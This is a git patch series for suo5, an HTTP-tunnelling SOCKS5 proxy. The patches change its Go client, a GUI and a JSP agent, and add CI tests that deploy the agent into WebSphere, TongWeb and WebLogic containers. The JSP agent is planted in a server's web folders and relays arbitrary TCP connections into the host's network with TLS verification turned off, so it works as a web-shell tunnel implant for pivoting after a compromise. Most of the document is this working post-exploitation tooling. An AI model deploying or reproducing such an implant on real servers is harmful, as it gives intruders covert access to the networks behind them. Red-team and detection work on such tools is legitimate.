From 4bfda81001451324a4ac3fd25f4857da8860222f Mon Sep 17 00:00:00 2001 From: zema1 Date: Tue, 16 May 2023 20:43:45 +0800 Subject: [PATCH 01/11] feat: better heatbeat --- ctrl/chunked.go | 8 ++---- ctrl/handler.go | 44 ++++------------------------ ctrl/heartbeat.go | 73 +++++++++++++++++++++++++++++++++++++++++++++++ 3 files changed, 81 insertions(+), 44 deletions(-) create mode 100644 ctrl/heartbeat.go diff --git a/ctrl/chunked.go b/ctrl/chunked.go index d1c698b..fcf7ac4 100644 --- a/ctrl/chunked.go +++ b/ctrl/chunked.go @@ -11,10 +11,6 @@ import ( "sync" ) -type RawWriter interface { - WriteRaw(p []byte) (n int, err error) -} - type fullChunkedReadWriter struct { id string reqBody io.WriteCloser @@ -27,7 +23,7 @@ type fullChunkedReadWriter struct { } // NewFullChunkedReadWriter 全双工读写流 -func NewFullChunkedReadWriter(id string, reqBody io.WriteCloser, serverResp io.ReadCloser) io.ReadWriter { +func NewFullChunkedReadWriter(id string, reqBody io.WriteCloser, serverResp io.ReadCloser) io.ReadWriteCloser { rw := &fullChunkedReadWriter{ id: id, reqBody: reqBody, @@ -107,7 +103,7 @@ type halfChunkedReadWriter struct { // NewHalfChunkedReadWriter 半双工读写流, 用发送请求的方式模拟写 func NewHalfChunkedReadWriter(ctx context.Context, id string, client *http.Client, method, target string, - serverResp io.ReadCloser, baseHeader http.Header, redirect string) io.ReadWriter { + serverResp io.ReadCloser, baseHeader http.Header, redirect string) io.ReadWriteCloser { return &halfChunkedReadWriter{ ctx: ctx, id: id, diff --git a/ctrl/handler.go b/ctrl/handler.go index b845b55..df9d71a 100644 --- a/ctrl/handler.go +++ b/ctrl/handler.go @@ -15,7 +15,6 @@ import ( "net/http" "strconv" "sync" - "time" ) type ConnectionType string @@ -128,23 +127,24 @@ func (m *socks5Handler) handleConnect(conn net.Conn, sockReq *gosocks5.Request) } log.Infof("successfully connected to %s", sockReq.Addr) - var streamRW io.ReadWriter + var streamRW io.ReadWriteCloser if m.config.Mode == FullDuplex { streamRW = NewFullChunkedReadWriter(id, chWR, resp.Body) } else { streamRW = NewHalfChunkedReadWriter(m.ctx, id, m.normalClient, m.config.Method, m.config.Target, resp.Body, baseHeader, m.config.RedirectURL) } - defer streamRW.(io.Closer).Close() - ctx, cancel := context.WithCancel(m.ctx) - defer cancel() + if !m.config.DisableHeartbeat { + streamRW = NewHeartbeatRW(streamRW.(RawReadWriteCloser), id, m.config.RedirectURL) + } + + defer streamRW.Close() var wg sync.WaitGroup wg.Add(1) go func() { defer wg.Done() - defer cancel() if err := m.pipe(conn, streamRW); err != nil { log.Debugf("local conn closed, %s", sockReq.Addr) _ = streamRW.(io.Closer).Close() @@ -153,23 +153,12 @@ func (m *socks5Handler) handleConnect(conn net.Conn, sockReq *gosocks5.Request) wg.Add(1) go func() { defer wg.Done() - defer cancel() if err := m.pipe(streamRW, conn); err != nil { log.Debugf("remote readwriter closed, %s", sockReq.Addr) _ = conn.Close() } }() - if !m.config.DisableHeartbeat { - wg.Add(1) - go func() { - defer wg.Done() - defer cancel() - m.heartbeat(ctx, id, m.config.RedirectURL, streamRW.(RawWriter)) - log.Debugf("heartbeat stopped, %s", sockReq.Addr) - }() - } - wg.Wait() log.Infof("connection closed, %s", sockReq.Addr) } @@ -189,27 +178,6 @@ func (m *socks5Handler) pipe(r io.Reader, w io.Writer) error { } } -// write data to the remote server to avoid server's ReadTimeout -// todo: lb still not work -func (m *socks5Handler) heartbeat(ctx context.Context, id, redirect string, w RawWriter) { - t := time.NewTicker(time.Second * 5) - defer t.Stop() - for { - select { - case <-t.C: - body := buildBody(newHeartbeat(id, redirect)) - log.Debugf("send heartbeat, length: %d", len(body)) - _, err := w.WriteRaw(body) - if err != nil { - log.Errorf("send heartbeat error %s", err) - return - } - case <-ctx.Done(): - return - } - } -} - func buildBody(m map[string][]byte) []byte { return netrans.NewDataFrame(marshal(m)).MarshalBinary() } diff --git a/ctrl/heartbeat.go b/ctrl/heartbeat.go new file mode 100644 index 0000000..caf04a7 --- /dev/null +++ b/ctrl/heartbeat.go @@ -0,0 +1,73 @@ +package ctrl + +import ( + "context" + log "github.com/kataras/golog" + "io" + "sync/atomic" + "time" +) + +type RawReadWriteCloser interface { + io.ReadWriteCloser + WriteRaw(p []byte) (n int, err error) +} + +func NewHeartbeatRW(rw RawReadWriteCloser, id, redirect string) io.ReadWriteCloser { + ctx, cancel := context.WithCancel(context.Background()) + h := &heartbeatRW{ + rw: rw, + id: id, + redirect: redirect, + cancel: cancel, + } + go h.heartbeat(ctx) + return h +} + +type heartbeatRW struct { + id string + redirect string + rw RawReadWriteCloser + lastHaveWrite atomic.Bool + cancel func() +} + +func (h *heartbeatRW) Read(p []byte) (n int, err error) { + return h.rw.Read(p) +} + +func (h *heartbeatRW) Write(p []byte) (n int, err error) { + h.lastHaveWrite.Store(true) + return h.rw.Write(p) +} + +func (h *heartbeatRW) Close() error { + h.cancel() + return h.rw.Close() +} + +// write data to the remote server to avoid server's ReadTimeout +func (h *heartbeatRW) heartbeat(ctx context.Context) { + t := time.NewTicker(time.Second * 5) + defer t.Stop() + for { + select { + case <-t.C: + if h.lastHaveWrite.Load() { + h.lastHaveWrite.Store(false) + continue + } + body := buildBody(newHeartbeat(h.id, h.redirect)) + log.Debugf("send heartbeat, length: %d", len(body)) + _, err := h.rw.WriteRaw(body) + if err != nil { + log.Errorf("send heartbeat error %s", err) + return + } + h.lastHaveWrite.Store(false) + case <-ctx.Done(): + return + } + } +} From b408fe500a18ae289db3f428c29045b84a324226 Mon Sep 17 00:00:00 2001 From: zema1 Date: Tue, 16 May 2023 20:53:59 +0800 Subject: [PATCH 02/11] feat: remove dep of session related to #22 --- .github/workflows/test.yml | 7 ++-- assets/suo5.jsp | 82 ++++++++++++++++++++++---------------- ctrl/ctrl.go | 10 ++--- go.sum | 6 --- 4 files changed, 55 insertions(+), 50 deletions(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index df6bfac..c0715b4 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -144,10 +144,9 @@ jobs: - container-registry.oracle.com/middleware/weblogic:14.1.1.0-11-ol8 deploy: - /u01/oracle/user_projects/domains/base_domain/autodeploy/ - # fixme: can't use full mode, why? - # include: - # - image: vulhub/weblogic:10.3.6.0-201 - # deploy: /root/Oracle/Middleware/user_projects/domains/base_domain/autodeploy/ + include: + - image: vulhub/weblogic:10.3.6.0-2017 + deploy: /root/Oracle/Middleware/user_projects/domains/base_domain/autodeploy/ env: SUO5_URL: http://127.0.0.1:7001/assets/suo5.jsp steps: diff --git a/assets/suo5.jsp b/assets/suo5.jsp index 2829b91..a40b685 100644 --- a/assets/suo5.jsp +++ b/assets/suo5.jsp @@ -1,7 +1,8 @@ <%@ page import="java.nio.ByteBuffer" %><%@ page import="java.io.*" %><%@ page import="java.net.*" %><%@ page import="java.security.cert.X509Certificate" %><%@ page import="java.security.cert.CertificateException" %><%@ page import="javax.net.ssl.*" %><%@ page import="java.util.*" %><%! public static class Suo5 implements Runnable, HostnameVerifier, X509TrustManager { - static HashMap addrs = collectAddr(); + public static HashMap addrs = collectAddr(); + public static HashMap ctx = new HashMap(); InputStream gInStream; OutputStream gOutStream; @@ -44,26 +45,20 @@ } } - public void readInputStreamWithTimeout(InputStream is, byte[] b, int timeoutMillis) throws IOException, InterruptedException { + public void readFull(InputStream is, byte[] b) throws IOException, InterruptedException { int bufferOffset = 0; - long maxTimeMillis = new Date().getTime() + timeoutMillis; - while (new Date().getTime() < maxTimeMillis && bufferOffset < b.length) { + while (bufferOffset < b.length) { int readLength = b.length - bufferOffset; - if (is.available() < readLength) { - readLength = is.available(); - } - // can alternatively use bufferedReader, guarded by isReady(): int readResult = is.read(b, bufferOffset, readLength); if (readResult == -1) break; bufferOffset += readResult; - Thread.sleep(200); } } public void tryFullDuplex(HttpServletRequest request, HttpServletResponse response) throws IOException, InterruptedException { InputStream in = request.getInputStream(); byte[] data = new byte[32]; - readInputStreamWithTimeout(in, data, 2000); + readFull(in, data); OutputStream out = response.getOutputStream(); out.write(data); out.flush(); @@ -112,6 +107,19 @@ ((bytes[3] & 0xFF) << 0); } + // 并发安全 + synchronized void put(String k, Object v) { + ctx.put(k, v); + } + + synchronized Object get(String k) { + return ctx.get(k); + } + + synchronized Object remove(String k) { + return ctx.remove(k); + } + byte[] copyOfRange(byte[] original, int from, int to) { int newLength = to - from; if (newLength < 0) { @@ -154,9 +162,8 @@ } private HashMap unmarshal(InputStream in) throws Exception { - DataInputStream reader = new DataInputStream(in); byte[] header = new byte[4 + 1]; // size and datatype - reader.readFully(header); + readFull(in, header); // read full ByteBuffer bb = ByteBuffer.wrap(header); int len = bb.getInt(); @@ -165,7 +172,7 @@ throw new IOException("invalid len"); } byte[] bs = new byte[len]; - reader.readFully(bs); + readFull(in, bs); for (int i = 0; i < bs.length; i++) { bs[i] = (byte) (bs[i] ^ x); } @@ -207,16 +214,15 @@ private void processDataBio(HttpServletRequest request, HttpServletResponse resp) throws Exception { final InputStream reqInputStream = request.getInputStream(); - final BufferedInputStream reqReader = new BufferedInputStream(reqInputStream); HashMap dataMap; - dataMap = unmarshal(reqReader); + dataMap = unmarshal(reqInputStream); byte[] action = (byte[]) dataMap.get("ac"); if (action.length != 1 || action[0] != 0x00) { resp.setStatus(403); return; } - resp.setBufferSize(8 * 1024); + resp.setBufferSize(512); final OutputStream respOutStream = resp.getOutputStream(); // 0x00 create socket @@ -236,6 +242,7 @@ respOutStream.write(marshal(newStatus((byte) 0x00))); respOutStream.flush(); + resp.flushBuffer(); final OutputStream scOutStream = sc.getOutputStream(); final InputStream scInStream = sc.getInputStream(); @@ -245,7 +252,7 @@ Suo5 p = new Suo5(scInStream, respOutStream); t = new Thread(p); t.start(); - readReq(reqReader, scOutStream); + readReq(reqInputStream, scOutStream); } catch (Exception e) { // System.out.printf("pipe error, %s\n", e); } finally { @@ -274,7 +281,7 @@ } } - private void readReq(BufferedInputStream bufInputStream, OutputStream socketOutStream) throws Exception { + private void readReq(InputStream bufInputStream, OutputStream socketOutStream) throws Exception { while (true) { HashMap dataMap; dataMap = unmarshal(bufInputStream); @@ -303,7 +310,6 @@ private void processDataUnary(HttpServletRequest request, HttpServletResponse resp) throws Exception { InputStream is = request.getInputStream(); - ServletContext ctx = request.getSession().getServletContext(); BufferedInputStream reader = new BufferedInputStream(is); HashMap dataMap; dataMap = unmarshal(reader); @@ -337,24 +343,26 @@ return; } - resp.setBufferSize(8 * 1024); + resp.setBufferSize(512); OutputStream respOutStream = resp.getOutputStream(); if (action[0] == 0x02) { - OutputStream scOutStream = (OutputStream) ctx.getAttribute(clientId); - if (scOutStream != null) { - scOutStream.close(); - } + Object o = this.get(clientId); + if (o == null) return; + OutputStream scOutStream = (OutputStream) o; + scOutStream.close(); return; } else if (action[0] == 0x01) { - OutputStream scOutStream = (OutputStream) ctx.getAttribute(clientId); - if (scOutStream == null) { + Object o = this.get(clientId); + if (o == null) { respOutStream.write(marshal(newDel())); respOutStream.flush(); respOutStream.close(); return; } + OutputStream scOutStream = (OutputStream) o; byte[] data = (byte[]) dataMap.get("dt"); if (data.length != 0) { +// System.out.printf("write datat to scOut, length: %d\n", data.length); scOutStream.write(data); scOutStream.flush(); } @@ -385,11 +393,15 @@ sc = new Socket(); sc.connect(new InetSocketAddress(host, port), 5000); readFrom = sc.getInputStream(); - ctx.setAttribute(clientId, sc.getOutputStream()); + this.put(clientId, sc.getOutputStream()); respOutStream.write(marshal(newStatus((byte) 0x00))); respOutStream.flush(); + resp.flushBuffer(); } catch (Exception e) { - ctx.removeAttribute(clientId); +// System.out.printf("connect error %s\n", e); +// e.printStackTrace(); + + this.remove(clientId); respOutStream.write(marshal(newStatus((byte) 0x01))); respOutStream.flush(); respOutStream.close(); @@ -400,8 +412,7 @@ try { readSocket(readFrom, respOutStream, !needRedirect); } catch (Exception e) { -// System.out.printf("pipe error, %s\n", e); -// e.printStackTrace(); + e.printStackTrace(); } finally { if (sc != null) { sc.close(); @@ -410,7 +421,7 @@ conn.disconnect(); } respOutStream.close(); - ctx.removeAttribute(clientId); + this.remove(clientId); } } @@ -475,9 +486,9 @@ // ref: https://github.com/L-codes/Neo-reGeorg/blob/master/templates/NeoreGeorg.java if (HttpsURLConnection.class.isInstance(conn)) { ((HttpsURLConnection) conn).setHostnameVerifier(this); - SSLContext ctx = SSLContext.getInstance("SSL"); - ctx.init(null, new TrustManager[]{this}, null); - ((HttpsURLConnection) conn).setSSLSocketFactory(ctx.getSocketFactory()); + SSLContext sslCtx = SSLContext.getInstance("SSL"); + sslCtx.init(null, new TrustManager[]{this}, null); + ((HttpsURLConnection) conn).setSSLSocketFactory(sslCtx.getSocketFactory()); } Enumeration headers = request.getHeaderNames(); @@ -513,6 +524,7 @@ o.process(request, response); try { out.clear(); - } catch (Exception e) {} + } catch (Exception e) { + } out = pageContext.pushBody(); %> \ No newline at end of file diff --git a/ctrl/ctrl.go b/ctrl/ctrl.go index ad36d22..a935d92 100644 --- a/ctrl/ctrl.go +++ b/ctrl/ctrl.go @@ -84,7 +84,7 @@ func Run(ctx context.Context, config *Suo5Config) error { log.Infof("method: %s", config.Method) log.Infof("testing connection with remote server") - err = checkMemshell(normalClient, config.Method, config.Target, config.Header.Clone()) + err = checkBasicConnect(normalClient, config.Method, config.Target, config.Header.Clone()) if err != nil { return err } @@ -173,7 +173,7 @@ func Run(ctx context.Context, config *Suo5Config) error { return nil } -func checkMemshell(client *http.Client, method string, target string, baseHeader http.Header) error { +func checkBasicConnect(client *http.Client, method string, target string, baseHeader http.Header) error { data := RandString(64) req, err := http.NewRequest(method, target, strings.NewReader(data)) if err != nil { @@ -206,19 +206,19 @@ func checkMemshell(client *http.Client, method string, target string, baseHeader func checkFullDuplex(method string, target string, baseHeader http.Header) bool { // 这里的 client 需要定义 timeout,不要用外面没有 timeout 的 rawCient rawClient := rawhttp.NewClient(&rawhttp.Options{ - Timeout: 3 * time.Second, + Timeout: 5 * time.Second, FollowRedirects: false, MaxRedirects: 0, AutomaticHostHeader: true, AutomaticContentLength: true, ForceReadAllBody: false, }) - data := RandString(64) + data := RandString(32) ch := make(chan []byte, 1) ch <- []byte(data) go func() { // timeout - time.Sleep(time.Second * 5) + time.Sleep(time.Second * 3) close(ch) }() req, err := http.NewRequest(method, target, netrans.NewChannelReader(ch)) diff --git a/go.sum b/go.sum index 064c37a..ff095c7 100644 --- a/go.sum +++ b/go.sum @@ -57,21 +57,15 @@ github.com/zema1/rawhttp v0.0.0-20221102031338-134c5669760c h1:vSrYC77zzwoHrtOyw github.com/zema1/rawhttp v0.0.0-20221102031338-134c5669760c/go.mod h1:4Jij1woZQptA1rqj+VhIokbXKmek4AJw7ze4GIru8mY= golang.org/x/net v0.0.0-20210521195947-fe42d452be8f/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= golang.org/x/net v0.0.0-20211216030914-fe4d6282115f/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= -golang.org/x/net v0.8.0 h1:Zrh2ngAOFYneWTAIAPethzeaQLuHwhuBkuV6ZiRnUaQ= -golang.org/x/net v0.8.0/go.mod h1:QVkue5JL9kW//ek3r6jTKnTFis1tRmNAW2P1shuFdJc= golang.org/x/net v0.9.0 h1:aWJ/m6xSmxWBx+V0XRHTlrYrPG56jKsLdTFmsSsCzOM= golang.org/x/net v0.9.0/go.mod h1:d48xBJpPfHeWQsugry2m+kC02ZBRGRgulfHnEXEuWns= golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= -golang.org/x/sys v0.6.0 h1:MVltZSvRTcU2ljQOhs94SXPftV6DCNnZViHeQps87pQ= -golang.org/x/sys v0.6.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.7.0 h1:3jlCCIQZPdOYu1h8BkNvLz8Kgwtae2cagcG/VamtZRU= golang.org/x/sys v0.7.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= golang.org/x/text v0.3.7/go.mod h1:u+2+/6zg+i71rQMx5EYifcz6MCKuco9NR6JIITiCfzQ= -golang.org/x/text v0.8.0 h1:57P1ETyNKtuIjB4SRd15iJxuhj8Gc416Y78H3qgMh68= -golang.org/x/text v0.8.0/go.mod h1:e1OnstbJyHTd6l/uOt8jFFHp6TRDWZR/bV3emEE/zU8= golang.org/x/text v0.9.0 h1:2sjJmO8cDvYveuX97RDLsxlyUxLl+GHoLxBiRdHllBE= golang.org/x/text v0.9.0/go.mod h1:e1OnstbJyHTd6l/uOt8jFFHp6TRDWZR/bV3emEE/zU8= golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= From ca1d3d8aacd201d1d2bb96318abd7737757d8dbd Mon Sep 17 00:00:00 2001 From: zema1 Date: Tue, 16 May 2023 21:14:40 +0800 Subject: [PATCH 03/11] feat: add websphere tests --- .github/workflows/test.yml | 37 +++++++++++++++++++++++++++++++++++-- 1 file changed, 35 insertions(+), 2 deletions(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index c0715b4..8eeff71 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -1,7 +1,6 @@ name: Run go tests on: push: - pull_request: permissions: contents: read jobs: @@ -126,7 +125,41 @@ jobs: ./suo5 -debug -t ${{ env.SUO5_URL }} -T https://www.bing.com -mode full ./suo5 -debug -t ${{ env.SUO5_URL }} -T https://www.bing.com -mode half - + websphere-test: + name: WebSphere + needs: build-binary + runs-on: ubuntu-latest + strategy: + fail-fast: false + matrix: + image: + - websphere-liberty:23.0.0.3-full-java8-ibmjava + - websphere-liberty:23.0.0.4-full-java11-openj9 + - websphere-liberty:22.0.0.9-full-java11-openj9 + - websphere-liberty:22.0.0.12-full-java17-openj9 + deploy: + - /config/dropins + env: + SUO5_URL: http://127.0.0.1:9080/assets/suo5.jsp + steps: + - uses: actions/checkout@v3 + - uses: ./.github/actions + with: + jar: true + - run: | + set -ex + docker run -it --rm -d -p9080:9080 --name webshpere-test \ + -v ${{ github.workspace }}/assets:${{ matrix.deploy }} \ + ${{ matrix.image }} + docker ps -a + bash ./.github/workflows/ready.sh http://127.0.0.1:9080 60 + sleep 10 + curl -v ${{ env.SUO5_URL }} + chmod +x ./suo5 + ./suo5 -debug -t ${{ env.SUO5_URL }} -T https://www.bing.com + ./suo5 -debug -t ${{ env.SUO5_URL }} -T https://www.bing.com -mode full + ./suo5 -debug -t ${{ env.SUO5_URL }} -T https://www.bing.com -mode half + weblogic-test: name: Weblogic From 5b42e97a2a5200e0ef126fc1b6133b4992b9782a Mon Sep 17 00:00:00 2001 From: zema1 Date: Tue, 16 May 2023 22:39:32 +0800 Subject: [PATCH 04/11] feat: add tongweb tests --- .github/workflows/test.yml | 33 ++++++++++++++++++++++++++++++++- ctrl/config.go | 1 + ctrl/ctrl.go | 3 +++ ctrl/handler.go | 1 - main.go | 8 ++++++++ 5 files changed, 44 insertions(+), 2 deletions(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 8eeff71..9faa338 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -159,7 +159,38 @@ jobs: ./suo5 -debug -t ${{ env.SUO5_URL }} -T https://www.bing.com ./suo5 -debug -t ${{ env.SUO5_URL }} -T https://www.bing.com -mode full ./suo5 -debug -t ${{ env.SUO5_URL }} -T https://www.bing.com -mode half - + + tongweb-test: + name: TongWeb + needs: build-binary + runs-on: ubuntu-latest + strategy: + fail-fast: false + matrix: + include: + - image: boyingking/tongweb-auto + deploy: /home/tw6/tongweb6/applications/console/assets + env: + SUO5_URL: http://127.0.0.1:9060/console/assets/suo5.jsp + steps: + - uses: actions/checkout@v3 + - uses: ./.github/actions + with: + jar: true + - run: | + set -ex + docker run -it --rm -d -p9060:9060 --name tongweb-test \ + -v ${{ github.workspace }}/assets:${{ matrix.deploy }} \ + ${{ matrix.image }} + docker ps -a + bash ./.github/workflows/ready.sh http://127.0.0.1:9060 30 + sleep 10 + curl -v ${{ env.SUO5_URL }} + chmod +x ./suo5 + ./suo5 -debug -t ${{ env.SUO5_URL }} -T https://www.bing.com -no-gzip + ./suo5 -debug -t ${{ env.SUO5_URL }} -T https://www.bing.com -mode full -no-gzip + ./suo5 -debug -t ${{ env.SUO5_URL }} -T https://www.bing.com -mode half -no-gzip + weblogic-test: name: Weblogic diff --git a/ctrl/config.go b/ctrl/config.go index 044f715..5734cfd 100644 --- a/ctrl/config.go +++ b/ctrl/config.go @@ -22,6 +22,7 @@ type Suo5Config struct { RedirectURL string `json:"redirect_url"` RawHeader []string `json:"raw_header"` DisableHeartbeat bool `json:"disable_heartbeat"` + DisableGzip bool `json:"disable-gzip"` Header http.Header `json:"-"` TestExit string `json:"-"` diff --git a/ctrl/ctrl.go b/ctrl/ctrl.go index a935d92..962bfe1 100644 --- a/ctrl/ctrl.go +++ b/ctrl/ctrl.go @@ -36,6 +36,9 @@ func Run(ctx context.Context, config *Suo5Config) error { if err != nil { return err } + if config.DisableGzip { + config.Header.Set("Accept-Encoding", "identity") + } tr := &http.Transport{ TLSClientConfig: &tls.Config{ diff --git a/ctrl/handler.go b/ctrl/handler.go index df9d71a..47be118 100644 --- a/ctrl/handler.go +++ b/ctrl/handler.go @@ -86,7 +86,6 @@ func (m *socks5Handler) handleConnect(conn net.Conn, sockReq *gosocks5.Request) req, _ = http.NewRequestWithContext(m.ctx, m.config.Method, m.config.Target, bytes.NewReader(dialData)) baseHeader.Set("Content-Type", ContentTypeHalf) req.Header = baseHeader - req.Header.Set("Accept-Encoding", "identity") resp, err = m.noTimeoutClient.Do(req) } if err != nil { diff --git a/main.go b/main.go index db91955..10d4f91 100644 --- a/main.go +++ b/main.go @@ -100,6 +100,12 @@ func main() { Usage: "disable heartbeat to the remote server which will send data every 5s", Value: defaultConfig.DisableHeartbeat, }, + &cli.BoolFlag{ + Name: "no-gzip", + Aliases: []string{"ng"}, + Usage: "disable gzip compression, which will improve compatibility with some old servers", + Value: defaultConfig.DisableHeartbeat, + }, &cli.StringFlag{ Name: "test-exit", Aliases: []string{"T"}, @@ -136,6 +142,7 @@ func Action(c *cli.Context) error { redirect := c.String("redirect") header := c.StringSlice("header") noHeartbeat := c.Bool("no-heartbeat") + noGzip := c.Bool("no-gzip") testExit := c.String("test-exit") var username, password string @@ -175,6 +182,7 @@ func Action(c *cli.Context) error { RedirectURL: redirect, RawHeader: header, DisableHeartbeat: noHeartbeat, + DisableGzip: noGzip, TestExit: testExit, } ctx, cancel := signalCtx() From 3db54cefd19028c7fc591bda38b1ff478644ba38 Mon Sep 17 00:00:00 2001 From: zema1 Date: Wed, 17 May 2023 14:01:53 +0800 Subject: [PATCH 05/11] feat: add no-gzip support --- assets/suo5.jsp | 8 ++------ ctrl/config.go | 2 +- ctrl/ctrl.go | 1 + gui/app.go | 23 ++++++++++++++--------- gui/frontend/src/Home.vue | 19 +++++++++++++------ gui/frontend/wailsjs/go/main/App.d.ts | 8 +++++--- gui/frontend/wailsjs/go/models.ts | 2 ++ gui/go.mod | 2 +- gui/go.sum | 4 ++-- 9 files changed, 41 insertions(+), 28 deletions(-) diff --git a/assets/suo5.jsp b/assets/suo5.jsp index a40b685..38d3013 100644 --- a/assets/suo5.jsp +++ b/assets/suo5.jsp @@ -107,7 +107,6 @@ ((bytes[3] & 0xFF) << 0); } - // 并发安全 synchronized void put(String k, Object v) { ctx.put(k, v); } @@ -266,7 +265,6 @@ private void readSocket(InputStream inputStream, OutputStream outputStream, boolean needMarshal) throws IOException { byte[] readBuf = new byte[1024 * 8]; - while (true) { int n = inputStream.read(readBuf); if (n <= 0) { @@ -362,7 +360,6 @@ OutputStream scOutStream = (OutputStream) o; byte[] data = (byte[]) dataMap.get("dt"); if (data.length != 0) { -// System.out.printf("write datat to scOut, length: %d\n", data.length); scOutStream.write(data); scOutStream.flush(); } @@ -400,7 +397,6 @@ } catch (Exception e) { // System.out.printf("connect error %s\n", e); // e.printStackTrace(); - this.remove(clientId); respOutStream.write(marshal(newStatus((byte) 0x01))); respOutStream.flush(); @@ -408,11 +404,11 @@ return; } } - try { readSocket(readFrom, respOutStream, !needRedirect); } catch (Exception e) { - e.printStackTrace(); +// System.out.println("socket error " + e.toString()); +// e.printStackTrace(); } finally { if (sc != null) { sc.close(); diff --git a/ctrl/config.go b/ctrl/config.go index 5734cfd..e42669f 100644 --- a/ctrl/config.go +++ b/ctrl/config.go @@ -22,7 +22,7 @@ type Suo5Config struct { RedirectURL string `json:"redirect_url"` RawHeader []string `json:"raw_header"` DisableHeartbeat bool `json:"disable_heartbeat"` - DisableGzip bool `json:"disable-gzip"` + DisableGzip bool `json:"disable_gzip"` Header http.Header `json:"-"` TestExit string `json:"-"` diff --git a/ctrl/ctrl.go b/ctrl/ctrl.go index 962bfe1..60c9e9c 100644 --- a/ctrl/ctrl.go +++ b/ctrl/ctrl.go @@ -37,6 +37,7 @@ func Run(ctx context.Context, config *Suo5Config) error { return err } if config.DisableGzip { + log.Infof("disable gzip") config.Header.Set("Accept-Encoding", "identity") } diff --git a/gui/app.go b/gui/app.go index 0c1eea0..ed4dc63 100644 --- a/gui/app.go +++ b/gui/app.go @@ -4,10 +4,11 @@ import ( "context" "fmt" "github.com/shirou/gopsutil/v3/process" - "github.com/wailsapp/wails/v2/pkg/runtime" + wailsRuntime "github.com/wailsapp/wails/v2/pkg/runtime" "github.com/zema1/suo5/ctrl" _ "net/http/pprof" "os" + "runtime" "sync/atomic" "time" ) @@ -38,7 +39,7 @@ func (a *App) startup(ctx context.Context) { for { select { case <-ticker.C: - runtime.EventsEmit(a.ctx, "status", a.GetStatus()) + wailsRuntime.EventsEmit(a.ctx, "status", a.GetStatus()) case <-ctx.Done(): return } @@ -55,7 +56,7 @@ func (a *App) RunSuo5WithConfig(config *ctrl.Suo5Config) { cliCtx, cancel := context.WithCancel(a.ctx) a.cancelSuo5 = cancel config.OnRemoteConnected = func(e *ctrl.ConnectedEvent) { - runtime.EventsEmit(a.ctx, "connected", e) + wailsRuntime.EventsEmit(a.ctx, "connected", e) } config.OnNewClientConnection = func(event *ctrl.ClientConnectionEvent) { atomic.AddInt32(&a.connCount, 1) @@ -69,7 +70,7 @@ func (a *App) RunSuo5WithConfig(config *ctrl.Suo5Config) { defer cancel() err := ctrl.Run(cliCtx, config) if err != nil { - runtime.EventsEmit(a.ctx, "error", err.Error()) + wailsRuntime.EventsEmit(a.ctx, "error", err.Error()) } }() } @@ -90,11 +91,15 @@ func (a *App) GetStatus() *Status { cpuPercent, _ := newProcess.CPUPercent() status.CPUPercent = fmt.Sprintf("%.2f%%", cpuPercent) - info, err := newProcess.MemoryInfo() - if err != nil { - return status + if runtime.GOOS != "darwin" { + info, err := newProcess.MemoryInfo() + if err != nil { + return status + } + status.MemoryUsage = fmt.Sprintf("%.2fMB", float64(info.VMS)/1024/1024) + } else { + status.MemoryUsage = "unsupported" } - status.MemoryUsage = fmt.Sprintf("%.2fMB", float64(info.VMS)/1024/1024) return status } @@ -115,6 +120,6 @@ type GuiLogger struct { } func (g *GuiLogger) Write(p []byte) (n int, err error) { - runtime.EventsEmit(g.ctx, "log", string(p)) + wailsRuntime.EventsEmit(g.ctx, "log", string(p)) return len(p), nil } diff --git a/gui/frontend/src/Home.vue b/gui/frontend/src/Home.vue index 009976c..0d70aba 100644 --- a/gui/frontend/src/Home.vue +++ b/gui/frontend/src/Home.vue @@ -76,7 +76,7 @@ 连接数: {{ status.connection_count }} CPU: {{ status.cpu_percent }} 内存: {{ status.memory_usage }} - 版本: 0.5.0 + 版本: 0.0.0
@@ -91,14 +91,18 @@ - - + + - - + + + + + + @@ -121,7 +125,7 @@ placeholder="用于应对负载均衡,流量将集中转发到这个 url"/> - + @@ -165,6 +169,7 @@ const formValue = ref({ redirect_url: '', raw_header: [], disable_heartbeat: false, + disable_gzip: false, }) const advancedOptions = ref(Object.assign({}, formValue.value)) @@ -192,6 +197,7 @@ const confirmAdvanced = () => { formValue.value.raw_header = advancedOptions.value.raw_header formValue.value.redirect_url = advancedOptions.value.redirect_url formValue.value.disable_heartbeat = advancedOptions.value.disable_heartbeat + formValue.value.disable_gzip = advancedOptions.value.disable_gzip showAdvanced.value = false } const formRef = ref(null) @@ -208,6 +214,7 @@ const runAction = async () => { return } checkingAction() + console.log(formValue.value) await RunSuo5WithConfig(formValue.value) } else { await Stop() diff --git a/gui/frontend/wailsjs/go/main/App.d.ts b/gui/frontend/wailsjs/go/main/App.d.ts index 019e18e..9b0c787 100644 --- a/gui/frontend/wailsjs/go/main/App.d.ts +++ b/gui/frontend/wailsjs/go/main/App.d.ts @@ -1,10 +1,12 @@ // Cynhyrchwyd y ffeil hon yn awtomatig. PEIDIWCH Â MODIWL // This file is automatically generated. DO NOT EDIT +import {ctrl} from '../models'; +import {main} from '../models'; -export function DefaultSuo5Config():Promise; +export function DefaultSuo5Config():Promise; -export function 